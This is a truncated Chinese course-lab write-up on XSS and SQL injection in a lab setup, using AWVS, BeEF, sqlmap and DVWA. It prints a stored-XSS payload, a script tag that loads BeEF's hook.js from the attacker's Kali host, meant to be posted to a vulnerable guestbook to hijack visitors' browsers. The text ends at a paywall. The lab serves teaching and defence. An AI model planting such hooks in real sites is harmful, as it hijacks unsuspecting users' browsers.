本实验详细介绍了XSS和SQL注入攻击的过程。在XSS部分,通过Beef和AWVS展示了如何利用存储型XSS攻击劫持浏览器。在SQL注入部分,使用DVWA和SQLmap进行数据库枚举,获取用户名与密码。实验旨在理解XSS攻击类型和SQL注入的基本原理,以及防御措施。
1. 实验目的和要求
了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。
系统环境:Kali Linux 2、Windows Server
网络环境:交换网络结构
实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
实验步骤:
2.实验步骤
XSS部分:利用Beef劫持被攻击者客户端浏览器。
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
1、 利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。
2、 Kali使用beef生成恶意代码,截图。
代码为:<script src="http://Kali的IP地址:3000/hook.js"></script>
3、访问http://留言簿网站/mess
最低0.47元/天 解锁文章
扫一扫
412
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
